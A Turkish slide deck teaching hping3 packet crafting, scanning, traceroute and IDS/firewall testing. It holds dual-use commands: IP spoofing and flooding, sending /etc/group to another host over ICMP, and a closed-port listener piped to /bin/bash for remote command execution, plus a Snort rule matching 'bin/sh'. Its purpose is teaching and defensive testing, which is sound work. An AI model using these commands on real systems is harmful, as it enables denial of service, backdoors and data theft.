SlideShare a Scribd company logo
1 of 37
Download to read offline
Hping, TCP/IP Paket
Üreteci
Bölüm İçeriği
• TCP/IP Paketleriyle Oynama
• Hping paket üretim aracı
• Artıları ve eksileriyle hping
• Hping kurulum ve kullanımı
• Hping ile TCP/UDP/ICMP paket üretimi
• Hping ile port tarama
TCP/IP Paketleriyle Oynama
• Amaç: TCP/IP Protokolünü daha iyi
tanımak.
• Paketlerin özelliklerini tanıyarak kötü
amaçlı kullanımlarını incelemek
Neden Hping? -I
• İstenilen türde TCP/IP paketleri oluşturmak
için kullanılan bir araç. Scapy, nemesis gibi
• Oluşturulacak paketlerde tüm alanları
kendimize özgü belirlenebilir
– Tcp bayraklari, window size, port, ip
• dinleme modu ile hostlara arası dosya
transferi ve komut çalıştırma özelliği(Truva
ati?)
• IDS/IPS testleri için özel veri alanı
belirtilebilmesi(ids imzalarinin testi)
– Exploit imzaları
Hping Eksiklikleri
• L2 seviyesinde paket oluşturamama
• Tarama yaparken birden fazla hedefe
düzenli paket gönderememe
• ICMP paketleri için yeterli derecede
esnek, kolay komut satırı seçenekleri
sunmama
Kurulumu
• Linux/UNIX/Windows Sistemlerde
çalışır
• Linux sistemler için
– Yum install hping3
– apt-get install hping3
• *BSD sistemler için pkg_add –vr
hping3
• Windows için hazır kurulum paketleri
– www.hping.org
Temel Hping Kullanımı
• Bilinmesi Gerekenler
– Öntanımlı olarak hping icmp yerine TCP paketlerini
kullanır
– Boş(herhangi bir bayrak set edilmemiş) bir tcp paketini
hedef sistemin 0 portuna gönderir.
• Tcpdump Çıktısı
– # tcpdump -i eth0 -tttnn tcp port 0
– IP 192.168.1.5.1894 > 192.168.1.1.0: . win 512
– IP 192.168.1.5.1895 > 192.168.1.1.0: . win 512
Komut satırı Seçenekleri
#hping –
h
Komutuyl
a
kullanılab
ilecek
tüm
seçenekl
er
#man
hping
İle detay
kullanım
bilgisi
Hping Çalışma Modları
• Varsayılan mod: TCP
• #hping3
-0 --rawip Raw ip paketleri
kullanmak için
-1 --icmp Icmp Paketi oluşturmak için.
-2 --udp UDP Paketleri oluşturmak
için.
-8 –scan Klasik Tarama modu.
-9 –listen Dinleme modu
TCP Paketleri ile Oynamak
• Hping ile tcp paketleri üretebilmek için TCP
yapısı iyi bilinmelidir.
• Sniffer çıktısından inceleme
– TCP Oturumunun hakimi Bayraklar!!
TCP Başlığı Sniffer Çıktısı
TCP Paketleri Oluşturmak-I
• SYN Bayraklı TCP Paketi
• # hping -S 192.168.1.1
• HPING 192.168.1.1 (eth0 192.168.1.1): S set, 40
headers + 0 data bytes len=46 ip=192.168.1.1 ttl=255
DF id=0 sport=0 flags=RA seq=0 win=0 rtt=2.5 ms
• !!-c parametresi ile kaç adet paket gönderileceği
belirtilir!!
• Tcpdump çıktısı
• # tcpdump -i eth0 -ttttnn tcp and host 192.168.1.1
• 2007-07-05 19:44:30.096849 IP 192.168.1.4.2244 >
192.168.1.1.0: S 2019758107:2019758107(0) win 512
• 2007-07-05 19:44:30.097393 IP 192.168.1.1.0 >
192.168.1.4.2244: R 0:0(0) ack 2019758108 win 0
TCP Paketleri Oluşturmak-II
• RST Bayraklı TCP Paketi Oluşturma
• # hping -R -c 3 192.168.1.1
• HPING 192.168.1.1 (eth0
192.168.1.1): R set, 40 headers + 0
data bytes
• Benzer şekilde –R yerine diğer TCP
bayrak tipleri konularak istenilen
türde TCP paketi oluşturulabilir.
TCP Paketleri Oluşturmak-III
• 1000. porta RST, FIN, PUSH ve SYN bayrakları set edilmiş
paket gönderimi
• # hping -RFSP -c 3 192.168.1.1 -p 1000
• HPING 192.168.1.1 (eth0 192.168.1.1): RSFP set, 40 headers
+ 0 data bytes ---
• 192.168.1.1 hping statistic --- 3 packets tramitted, 0 packets
received, 100% packet loss round-trip min/avg/max =
0.0/0.0/0.0 ms
• -p parametresi kullanılarak hedef sisteme gönderilen
paketlerin hangi porta gideceği belirtilir. Default olarak bu
değer 0 dır.
• -s parametresi ile kaynak TCP portu değiştirilebilir, öntanımlı
olarak bu değer rastgele atanır.
UDP Paketleri ile Oynamak
• # hping --udp 194.27.72.88 -s 53 -p 53 -b -y -c 1
-t 11
• HPING 194.27.72.88 (eth0 194.27.72.88): udp
mode set, 28 headers + 0 data bytes
• -b badcksum
• -y DF
• -t TTL
• # tcpdump -i ste0 -tnn -vv udp port 53
• 88.234.152.48.53 > 194.27.72.88.53: [bad udp
cksum 52cd!] 0 [0q] (0) (DF) (ttl 3, id 30147, len
28)
ICMP & IP Paketleri ile Oynama
ICMP Paketleri
• ICMP paketlerinde TCP ve UDP’deki gibi port değeri yoktur
bunlara benzer olarak icmp type ve icmp code değerleri vardır.
• Hata belirleme Amaçlı kullanılır(UDP Kapalı port örneği, TTL
Expired örneği)
• Bir ICMP paketinin ne işe yaradığı bu değerlerle belirlenir. Bazı
icmp type değerleri ek olarak icmp code değerine de sahiptir.
• Mesela icmp type 3’un 15 farkli code degeri vardir...
• icmp type 3 mesajı: Destination Unreachable
– 0 Net Unreachable ?
1 Host Unreachable ?
2 Protocol Unreachable ?
3 Port Unreachable ?
• Klasik ping paketi oluşturalım
– # hping --icmp 192.168.1.1 -c 1
UDP & ICMP Paketi
• Kapalı UDP portuna istek gönderelim
– # hping --udp 192.168.1.1 -p 9000 -n -c 1
– HPING 192.168.1.1 (eth0 192.168.1.1): udp mode set,
28 headers + 0 data bytes ICMP Port Unreachable from
ip=192.168.1.1
• # tcpdump -i eth0 -ttttnn udp or icmp and host
192.168.1.1
• 2007-07-05 20:15:49.368744 IP 192.168.1.4.2548
> 192.168.1.1.9000: UDP, length 0
• 2007-07-05 20:15:49.369452 IP 192.168.1.1 >
192.168.1.4: ICMP 192.168.1.1 udp port 9000
unreachable, length 36
Hping ile IP Spoofing
• #hping -a 123.123.123.234 --udp 194.27.72.88 -s
900 -p 900 -b -y -c 1 -t 11
HPING 194.27.72.88 (eth0 194.27.72.88): udp mode set, 28 headers + 0 data
bytes
• Bu paket Firewall/modem’inizi aşıp interente
gidebiliyorsa kurallarınızı gözden geçirin!
• Neden?? İç ağdan size ait olmayan bir ip
adresinden paketler gönderiyorsunuz. Önünüzdeki
cihaz(Router, modem, Firewall) kaynak ip adresini
mutlaka kontrol etmeli ve kendi agina ait olmayan
kaynak iplerden paket almamalı.
• A firmasından geliyormuş gibi B firmasında DOS
saldırısı yapılabilir
Port Tarama Aracı olarak Hping
• ++port_numarasi kullanarak her
seferinde port numarasının bir
artmasını sağla
Port Tarama Aracı olarak hping
-II
• Daha düzenli çıktı almak için --scan
parametresi kullanılabilir.
SYN Scan/FIN Scan/Null Scan/Xmas Tarama
Çeşitleri
• Xmas Scan Örneği
Bu tarama tipinde amaç hedef
sisteme FIN/URG/PSH bayrakları set
edilmiş TCP paketleri göndererek
Kapali sistemler için RST/ACK
Açık sistemler için cevap
dönmemesini beklemektir.
• #hping –FUP hedef_sistem -p 80
– OpenBSD PacketFilter scrub özelliği bu tip
anormal paketleri engeller.
Traceroute Aracı olarak Hping
• Hping çeşitli protokolleri(ICMP, UDP, TCP) kullanarak
Traceroute işlevi görebilir.
• -t ile ilk paketin hangi TTL değeri ile başlayacağı belirtilir. –z ile
TTL değerini istediğimiz zaman Ctrl ^z tuş fonksiyonları ile
arttırabiliriz.
-p ile port numarası belirtilir, herhangi bir port numarası
belirledikten sonra tarama esnasında CTRL^z tusuna basarak
her pakette port numarasının bir arttırılmasını sağlayabiliriz.
UDP Traceroute
• hping3 --udp -p 53 91.93.119.80 -T
Firewall Performans Testleri
• --rand-source
• --rand-dest 91.93.119.x
• --flood
1 saniye
1.000.0000
mikro
saniye
Hedef Sistem Hakkında Bilgi Edinmek
• Sequence numarası tahmini
• Hedef Sistemin Uptime Süresi
Belirleme
• Hedef sistemin zamanını belirleme
• Hedef sistemin ağ maskesini
belirleme etc...
Sıra Numarası Tahmini
Hedef Sistemin Uptime Süresi Belirleme
IDS/IPS Testlerinde Hping
Kullanımı
• Rastgele özellikte paketler
oluşturarak
– Fragmented, bozuk ip versiyon bilgisi,
tcp, udp başlık bilgisi.
• Kaynak ip adreslerini spoof ederek
• Paket seli oluşturarak sistemin
performansı ölçülebilir.
• Exploit içeriklerini parametre olarak
vererek
IDS/IPS Testlerinde Hping Kullanımı-II
• Hazırladığımız bir exploit içeriğini IDS
kurallarını test etmek için kullanalım
– # more exptest
GET /scripts/slxweb.dll/view?
name=mainpage HTTP/1.0 ,
IDS/IPS Testlerinde Hping Kullanımı-II
• Aşağıdaki gibi bir Snort kuralımız olsun
– alert tcp $EXTERNAL_NET any -> $TELNET_SERVERS 23
(msg:"TELNET xyz exploit attempt"; flow:to_server;
content:"bin/sh"; classtype:she llcode-detect; sid:1430; rev:7;)
• Exploit içeriğimiz: # cat snort_test bin/sh
• Paketi gönderelim
– # hping -n -c 1 -P 192.168.1.4 -p 23 -d 50 -E snort_test
• Snort Loglarına bakacak olursak kuralımızın
tetiklendiğini görürüz.
– [**] [1:1430:7] TELNET xyz exploit attempt [**] [Classification:
Executable code was detected] [Priority: 1] 07/12-
21:53:46.758684 192.168.1.5:2445 -> 192.168.1.4:23 TCP
TTL:64 TOS:0x0 ID:49841 IpLen:20 DgmLen:90 ****P*** Seq:
0x16AB9A80 Ack: 0x37A74B05 Win: 0x200 TcpLen: 20
Hping taramalarının IDS'ler tarafından
yakalanması.
• Port tarama araçlarının kendilerine
özgü imzaları vardır. NIDS gibi
sistemler tarama yapan araçları bu
imzalarından tanıyarak alarm
üretirler.
• Tarama Yaparken Kaynak Portları
birer birer arttırır.
– Nmap Sabit tutar!
Hping Taramalarının
Karekteristigi
Hping ile Dosya Transferi
• Bir hosttan diğerine /etc/group dosyasını
gönderelim.
• Gönderici Host
– #hping --icmp 192.168.1.4 -d 200 --sign
huzeyfe --file /etc/group
• Dinleyici taraf
• # hping --icmp 192.168.1.4 --listen huzeyfe
--safe -I eth0 hping2 listen mode [main]
memlockall(): Success Warning: can't
disable memory paging! ..
– .etc/group içeriği
Hping ile uzak sistemlerde komut çalıştırma
• A Sistemi / dinlemede olan taraf
– # hping --listen gizli_kanal -n -p 22
|/bin/bash
• B Sistemi /Gönderici
• # nc 127.0.0.1 22 -n SSH-1.99-
OpenSSH_4.4
• gizli_kanal touch /tmp/hping_irc
• Protocol mismatch.
Kapalı porta veri göndererek Komut Çalıştırma
• Açık porta netcat ya da benzeri bir
uygulama ile bağlanarak karşılama
banneri sonrası komut
gönderebiliyorduk fakat kapalı port
için böyle bir seçeneğimiz yok. Zira
daha TCP bağlantısı kurulmadan
hedef porttan RST cevabı dönecektir.
Kapalı porta veri göndererek Komut Çalıştırma
• B Sistemi
Kapali bir TCP portu bularak hping’e o porta
gelen paketleri dinlemesi ve çıktılarını
/bin/bash’e göndermesini söyleyeli
• # hping --listen safeme -p 5555 -n |/bin/bash
• A Sistemi
Hedef sisteme göndermek istediğimiz komut/ları
bir dosya içerisine kaydedelim.
• #echo “touch /tmp/kapali_porta_geldim” >
komut_dosyasi
• # hping --sign safeme -d 50 -E komut_dosyasi -p
5555 192.168.1.5 -n -c 1

More Related Content

What's hot

Uygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab ÇalışmalarıUygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab ÇalışmalarıBGA Cyber Security
 
Uygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim NotlarıUygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim NotlarıBGA Cyber Security
 
GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMABGA Cyber Security
 
Oracle Veritabanı Güvenlik Testi Çalışmaları
Oracle Veritabanı Güvenlik Testi ÇalışmalarıOracle Veritabanı Güvenlik Testi Çalışmaları
Oracle Veritabanı Güvenlik Testi ÇalışmalarıBGA Cyber Security
 
INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ BGA Cyber Security
 
Hping Kullanarak Ağ Keşif Çalışmaları
Hping Kullanarak Ağ Keşif ÇalışmalarıHping Kullanarak Ağ Keşif Çalışmaları
Hping Kullanarak Ağ Keşif ÇalışmalarıBGA Cyber Security
 
Mitre ATT&CK Kullanarak Etkin Saldırı Tespiti
Mitre ATT&CK Kullanarak Etkin Saldırı TespitiMitre ATT&CK Kullanarak Etkin Saldırı Tespiti
Mitre ATT&CK Kullanarak Etkin Saldırı TespitiBGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12BGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6BGA Cyber Security
 
Log Yönetimi ve Saldırı Analizi Eğitimi - 2
Log Yönetimi ve Saldırı Analizi Eğitimi - 2Log Yönetimi ve Saldırı Analizi Eğitimi - 2
Log Yönetimi ve Saldırı Analizi Eğitimi - 2BGA Cyber Security
 
Siber Saldırılar i̇çin Erken Uyarı Sistemi
Siber Saldırılar i̇çin Erken Uyarı SistemiSiber Saldırılar i̇çin Erken Uyarı Sistemi
Siber Saldırılar i̇çin Erken Uyarı SistemiBGA Cyber Security
 
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab KitabıBeyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab KitabıBGA Cyber Security
 
Pentest Çalışmalarında Kablosuz Ağ Güvenlik Testleri
Pentest Çalışmalarında Kablosuz Ağ Güvenlik TestleriPentest Çalışmalarında Kablosuz Ağ Güvenlik Testleri
Pentest Çalışmalarında Kablosuz Ağ Güvenlik TestleriBGA Cyber Security
 
Sızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage KullanımıSızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage KullanımıBGA Cyber Security
 
SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri AtlatmakSSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri AtlatmakBGA Cyber Security
 

What's hot (20)

Uygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab ÇalışmalarıUygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
 
Uygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim NotlarıUygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim Notları
 
GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMA
 
Oracle Veritabanı Güvenlik Testi Çalışmaları
Oracle Veritabanı Güvenlik Testi ÇalışmalarıOracle Veritabanı Güvenlik Testi Çalışmaları
Oracle Veritabanı Güvenlik Testi Çalışmaları
 
INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ
 
Hping Kullanarak Ağ Keşif Çalışmaları
Hping Kullanarak Ağ Keşif ÇalışmalarıHping Kullanarak Ağ Keşif Çalışmaları
Hping Kullanarak Ağ Keşif Çalışmaları
 
Metasploit Framework Eğitimi
Metasploit Framework EğitimiMetasploit Framework Eğitimi
Metasploit Framework Eğitimi
 
Mitre ATT&CK Kullanarak Etkin Saldırı Tespiti
Mitre ATT&CK Kullanarak Etkin Saldırı TespitiMitre ATT&CK Kullanarak Etkin Saldırı Tespiti
Mitre ATT&CK Kullanarak Etkin Saldırı Tespiti
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
 
BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 2
BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 2BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 2
BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 2
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
 
Log Yönetimi ve Saldırı Analizi Eğitimi - 2
Log Yönetimi ve Saldırı Analizi Eğitimi - 2Log Yönetimi ve Saldırı Analizi Eğitimi - 2
Log Yönetimi ve Saldırı Analizi Eğitimi - 2
 
VERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİVERİTABANI SIZMA TESTLERİ
VERİTABANI SIZMA TESTLERİ
 
Siber Saldırılar i̇çin Erken Uyarı Sistemi
Siber Saldırılar i̇çin Erken Uyarı SistemiSiber Saldırılar i̇çin Erken Uyarı Sistemi
Siber Saldırılar i̇çin Erken Uyarı Sistemi
 
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
 
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab KitabıBeyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
 
Pentest Çalışmalarında Kablosuz Ağ Güvenlik Testleri
Pentest Çalışmalarında Kablosuz Ağ Güvenlik TestleriPentest Çalışmalarında Kablosuz Ağ Güvenlik Testleri
Pentest Çalışmalarında Kablosuz Ağ Güvenlik Testleri
 
Hacking'in Mavi Tarafı -2
Hacking'in Mavi Tarafı -2Hacking'in Mavi Tarafı -2
Hacking'in Mavi Tarafı -2
 
Sızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage KullanımıSızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage Kullanımı
 
SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri AtlatmakSSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
SSH Tünelleme ile İçerik Filtreleyicileri Atlatmak
 

Viewers also liked

Man in the Middle Atack
Man in the Middle AtackMan in the Middle Atack
Man in the Middle AtackSDU CYBERLAB
 
Linux 101 - Kullanıcı Yönetimi
Linux 101 - Kullanıcı YönetimiLinux 101 - Kullanıcı Yönetimi
Linux 101 - Kullanıcı YönetimiSDU CYBERLAB
 
Python Metaprogramming
Python MetaprogrammingPython Metaprogramming
Python MetaprogrammingSDU CYBERLAB
 
Kablosuz Ağ Saldırı Araçları
Kablosuz Ağ Saldırı AraçlarıKablosuz Ağ Saldırı Araçları
Kablosuz Ağ Saldırı AraçlarıBGA Cyber Security
 
Linux 101 - GNU/Linux Nedir ? Nasıl Kurulur?
Linux 101 - GNU/Linux Nedir ? Nasıl Kurulur?Linux 101 - GNU/Linux Nedir ? Nasıl Kurulur?
Linux 101 - GNU/Linux Nedir ? Nasıl Kurulur?SDU CYBERLAB
 
SDU Siber Güvenlik Zirvesi - Anıl Baran Yelken - Python ile Sızma Testi Araç...
SDU Siber Güvenlik Zirvesi - Anıl Baran Yelken - Python ile Sızma Testi Araç...SDU Siber Güvenlik Zirvesi - Anıl Baran Yelken - Python ile Sızma Testi Araç...
SDU Siber Güvenlik Zirvesi - Anıl Baran Yelken - Python ile Sızma Testi Araç...SDU CYBERLAB
 
Beyaz Şapkalı Hacker Eğitimi Yardımcı Ders Notları
Beyaz Şapkalı Hacker Eğitimi Yardımcı Ders NotlarıBeyaz Şapkalı Hacker Eğitimi Yardımcı Ders Notları
Beyaz Şapkalı Hacker Eğitimi Yardımcı Ders NotlarıBGA Cyber Security
 
Temel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş DökümanıTemel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş DökümanıAhmet Gürel
 
Footprinting - Shodan
Footprinting - ShodanFootprinting - Shodan
Footprinting - ShodanSDU CYBERLAB
 
Linux 101 - Ağ Temelleri
Linux 101 - Ağ TemelleriLinux 101 - Ağ Temelleri
Linux 101 - Ağ TemelleriSDU CYBERLAB
 
Kali ile Linux'e Giriş | IntelRAD
Kali ile Linux'e Giriş | IntelRADKali ile Linux'e Giriş | IntelRAD
Kali ile Linux'e Giriş | IntelRADMehmet Ince
 
İleri Seviye Ağ Güvenliği Lab Kitabı
İleri Seviye Ağ Güvenliği Lab Kitabıİleri Seviye Ağ Güvenliği Lab Kitabı
İleri Seviye Ağ Güvenliği Lab KitabıBGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19BGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3BGA Cyber Security
 
Android Zararlı Yazılım Analizi ve Güvenlik Yaklaşımları
Android Zararlı Yazılım Analizi ve Güvenlik YaklaşımlarıAndroid Zararlı Yazılım Analizi ve Güvenlik Yaklaşımları
Android Zararlı Yazılım Analizi ve Güvenlik YaklaşımlarıBGA Cyber Security
 
Etkin Siber Savunma i̇çin Tehdit Avcılığı
Etkin Siber Savunma i̇çin Tehdit Avcılığı Etkin Siber Savunma i̇çin Tehdit Avcılığı
Etkin Siber Savunma i̇çin Tehdit Avcılığı BGA Cyber Security
 

Viewers also liked (17)

Man in the Middle Atack
Man in the Middle AtackMan in the Middle Atack
Man in the Middle Atack
 
Linux 101 - Kullanıcı Yönetimi
Linux 101 - Kullanıcı YönetimiLinux 101 - Kullanıcı Yönetimi
Linux 101 - Kullanıcı Yönetimi
 
Python Metaprogramming
Python MetaprogrammingPython Metaprogramming
Python Metaprogramming
 
Kablosuz Ağ Saldırı Araçları
Kablosuz Ağ Saldırı AraçlarıKablosuz Ağ Saldırı Araçları
Kablosuz Ağ Saldırı Araçları
 
Linux 101 - GNU/Linux Nedir ? Nasıl Kurulur?
Linux 101 - GNU/Linux Nedir ? Nasıl Kurulur?Linux 101 - GNU/Linux Nedir ? Nasıl Kurulur?
Linux 101 - GNU/Linux Nedir ? Nasıl Kurulur?
 
Web Socket
Web SocketWeb Socket
Web Socket
 
SDU Siber Güvenlik Zirvesi - Anıl Baran Yelken - Python ile Sızma Testi Araç...
SDU Siber Güvenlik Zirvesi - Anıl Baran Yelken - Python ile Sızma Testi Araç...SDU Siber Güvenlik Zirvesi - Anıl Baran Yelken - Python ile Sızma Testi Araç...
SDU Siber Güvenlik Zirvesi - Anıl Baran Yelken - Python ile Sızma Testi Araç...
 
Beyaz Şapkalı Hacker Eğitimi Yardımcı Ders Notları
Beyaz Şapkalı Hacker Eğitimi Yardımcı Ders NotlarıBeyaz Şapkalı Hacker Eğitimi Yardımcı Ders Notları
Beyaz Şapkalı Hacker Eğitimi Yardımcı Ders Notları
 
Temel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş DökümanıTemel Ağ Sızma Testine Giriş Dökümanı
Temel Ağ Sızma Testine Giriş Dökümanı
 
Footprinting - Shodan
Footprinting - ShodanFootprinting - Shodan
Footprinting - Shodan
 
Linux 101 - Ağ Temelleri
Linux 101 - Ağ TemelleriLinux 101 - Ağ Temelleri
Linux 101 - Ağ Temelleri
 
Kali ile Linux'e Giriş | IntelRAD
Kali ile Linux'e Giriş | IntelRADKali ile Linux'e Giriş | IntelRAD
Kali ile Linux'e Giriş | IntelRAD
 
İleri Seviye Ağ Güvenliği Lab Kitabı
İleri Seviye Ağ Güvenliği Lab Kitabıİleri Seviye Ağ Güvenliği Lab Kitabı
İleri Seviye Ağ Güvenliği Lab Kitabı
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 19
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
 
Android Zararlı Yazılım Analizi ve Güvenlik Yaklaşımları
Android Zararlı Yazılım Analizi ve Güvenlik YaklaşımlarıAndroid Zararlı Yazılım Analizi ve Güvenlik Yaklaşımları
Android Zararlı Yazılım Analizi ve Güvenlik Yaklaşımları
 
Etkin Siber Savunma i̇çin Tehdit Avcılığı
Etkin Siber Savunma i̇çin Tehdit Avcılığı Etkin Siber Savunma i̇çin Tehdit Avcılığı
Etkin Siber Savunma i̇çin Tehdit Avcılığı
 

Similar to Hping, TCP/IP Paket Üretici

Hping ile IP/ICMP ve UDP Paketleri Oluşturma
Hping ile IP/ICMP ve UDP Paketleri OluşturmaHping ile IP/ICMP ve UDP Paketleri Oluşturma
Hping ile IP/ICMP ve UDP Paketleri OluşturmaBGA Cyber Security
 
Siber Güvenlik 1. hafta
Siber Güvenlik 1. haftaSiber Güvenlik 1. hafta
Siber Güvenlik 1. haftaOnur Er
 
TCP/IP Ağlarda Parçalanmış Paketler ve Etkileri
TCP/IP Ağlarda Parçalanmış Paketler ve EtkileriTCP/IP Ağlarda Parçalanmış Paketler ve Etkileri
TCP/IP Ağlarda Parçalanmış Paketler ve EtkileriBGA Cyber Security
 
Packet-O-Matic:Network Forensic Aracı
Packet-O-Matic:Network Forensic AracıPacket-O-Matic:Network Forensic Aracı
Packet-O-Matic:Network Forensic AracıBGA Cyber Security
 
PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI BGA Cyber Security
 
Python İle Ağ Programlama
Python İle Ağ ProgramlamaPython İle Ağ Programlama
Python İle Ağ ProgramlamaOguzhan Coskun
 
IP, IGP, MPLS Eğitim Sunumu @Çankaya Üniversitesi
IP, IGP, MPLS Eğitim Sunumu @Çankaya Üniversitesi IP, IGP, MPLS Eğitim Sunumu @Çankaya Üniversitesi
IP, IGP, MPLS Eğitim Sunumu @Çankaya Üniversitesi Murat Can Demir
 
Suricata ile siber tehdit avcılığı
Suricata ile siber tehdit avcılığıSuricata ile siber tehdit avcılığı
Suricata ile siber tehdit avcılığıKurtuluş Karasu
 
Cmd (ms dos) komutları cansu salduz
Cmd (ms dos) komutları cansu salduzCmd (ms dos) komutları cansu salduz
Cmd (ms dos) komutları cansu salduzOnur Kılıç
 
Temel ag prog_yapilari_mseml
Temel ag prog_yapilari_msemlTemel ag prog_yapilari_mseml
Temel ag prog_yapilari_msemlmimarsinantl
 
İnformation Gathering - Bilgi Toplama (Cyber Security - Siber Güvenlik))
İnformation Gathering - Bilgi Toplama (Cyber Security - Siber Güvenlik))İnformation Gathering - Bilgi Toplama (Cyber Security - Siber Güvenlik))
İnformation Gathering - Bilgi Toplama (Cyber Security - Siber Güvenlik))Kerem Demirtürk
 
Nmap kullanimi
Nmap kullanimiNmap kullanimi
Nmap kullanimicigalkan
 
Ine Multicast
Ine MulticastIne Multicast
Ine MulticastAlp isik
 
Siber Güvenlik ve Etik Hacking Sunu - 4
Siber Güvenlik ve Etik Hacking Sunu - 4Siber Güvenlik ve Etik Hacking Sunu - 4
Siber Güvenlik ve Etik Hacking Sunu - 4Murat KARA
 

Similar to Hping, TCP/IP Paket Üretici (20)

Hping ile IP/ICMP ve UDP Paketleri Oluşturma
Hping ile IP/ICMP ve UDP Paketleri OluşturmaHping ile IP/ICMP ve UDP Paketleri Oluşturma
Hping ile IP/ICMP ve UDP Paketleri Oluşturma
 
Nmap & Hping
Nmap & HpingNmap & Hping
Nmap & Hping
 
Siber Güvenlik 1. hafta
Siber Güvenlik 1. haftaSiber Güvenlik 1. hafta
Siber Güvenlik 1. hafta
 
Tcp ip
Tcp ipTcp ip
